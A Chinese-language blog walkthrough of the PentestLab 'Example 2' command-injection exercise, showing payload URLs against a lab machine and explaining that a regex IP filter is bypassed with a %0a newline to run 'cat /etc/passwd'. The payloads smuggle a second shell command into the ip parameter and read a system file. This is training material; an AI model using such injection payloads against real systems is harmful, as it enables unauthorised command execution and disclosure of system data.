首页 > 其他分享 >PentestLab-web安全命令注入-EXP2

PentestLab-web安全命令注入-EXP2

时间:2023-04-05 17:03:19浏览次数:41  
标签:web 127.0 http ip 29.148 192.168 example2 EXP2 PentestLab


我们打开靶机

选择“Example 2”


PentestLab-web安全命令注入-EXP2_IP


观察页面


PentestLab-web安全命令注入-EXP2_php_02


我们尝试


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig


结果


PentestLab-web安全命令注入-EXP2_php_03


我们尝试%0a


PentestLab-web安全命令注入-EXP2_正则_04


于是payload为


http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd


结果


PentestLab-web安全命令注入-EXP2_php_05


我们观察靶机源码


PentestLab-web安全命令注入-EXP2_IP_06


使用了正则来匹配IP地址

可以使用%0a进行截断

标签:web,127.0,http,ip,29.148,192.168,example2,EXP2,PentestLab
From: https://blog.51cto.com/apple0/6171202

相关文章

  • JavaWeb-response 下载文件-2023-04-05
    packagecom.feijian.servlet;importjavax.servlet.ServletException;importjavax.servlet.ServletOutputStream;importjavax.servlet.http.HttpServlet;importjavax.servlet.http.HttpServletRequest;importjavax.servlet.http.HttpServletResponse;importjava.......
  • INFS3202 Web Information Systems
    SchoolofInformationTechnology&ElectricalEngineeringINFS3202/7202WebInformationSystems1of4INFS3202/7202WebInformationSystemsINFS3202/INFS7202WebInformationSystemsIn-classQuiz1:Thefollowingconditionsapplytothequiz:•Thequizco......
  • [ML] 详解 ChatGLM-webui 的启动使用与 ChatGLM-6B 常见问题
     1.ChatGLM-webui总共支持以下几个命令选项: 2.以windows为例,在PowerShell里运行命令: #安装依赖pipinstalltorch==1.13.1+cu117torchvision==0.14.1+cu117-fhttps://mirror.sjtu.edu.cn/pytorch-wheels/torch_stable.html-ihttps://mirrors.bfsu.edu.cn/p......
  • Web开发的那点事--业务层常用功能
      常见功能(以博客中的文章管理为示例)   1.增加   业务:写一篇文章  技术:    前端:一个页面或者对话框,等待用户输入,数据校验成功,提交代码      后端:存储到一个数据库表格中,有可能会存进多个表格。    常见问题:是否能重复增加    2.查看......
  • 一个Web报表项目的性能分析和优化实践(六):设置MySQL的最大连接数(max_connections)
    在上一篇文章中"一个Web报表项目的性能分析和优化实践(二):MySQL数据库连接不够用(TooManyConnections)问题的一次分析和解决案例"提到,项目中新增几个数据库后,数据库最大连接数达到了默认的最大值100。此时,如果再创建连接,就会报错(TooManyConnections)。因此,需要手动设置MySQL的最......
  • 一个Web报表项目的性能分析和优化实践(四):MySQL建立索引,唯一索引和组合索引
    先大致介绍下项目的数据库信息。数据库A:主要存放的通用的表,如User、Project、Report等。数据库B、C、D:一个项目对应一个数据库,而且这几个项目的表是完全一样的。数据库表的特点A中的表:数据量几乎都比较小,比如User表中用户数,顶多也就几百上千。B中的表:X/Y/Z3张表几乎是确定的,Data表......
  • Web开发的那点事--数据持久层常用功能
    数据持久层--4类功能1.增加 增加一条记录-实体(有关联,没有关联) 2.修改 修改一个字段 修改多个字段 修改哪一列或哪些列:where一列多列 主键定位,多个列定位3.删除  物理删除:删除哪一列或哪些列  逻辑删除:本质是更新操作,修改isDeleted(对所有表的记录逻辑删除,几......
  • Web开发的那点事--高效之道
    --------------------目标------------------核心目标:提高公司和个人开发效率,降低测试时间,减少Bug。--------------------指标----------------开发效率:提高开发效率20%以上。容易测试:根据源码容易判断是否正确,或者容易看到运行时效果。容易理解:具有很好的可读性和可实践性。容......
  • 最近遇到的若干Web前端问题:disable和readonly,JqueryEasyUI,KindEditor
     最近项目中用到了JqueryEasyui和KindEditor等框架组件,问题真不少啊~ 一些看起来很简单理所当然的事情,竟然花费了不少时间,才解决好~  1.readonly和disable的区别 readonly:只读,不可编辑,提交表单时,值会提交到后端。 disable:禁止(包含了“只读”......
  • java——maven——idea使用模板(骨架)创建maven工程——webapp(重点)
    黑马模板:                  本地:         ......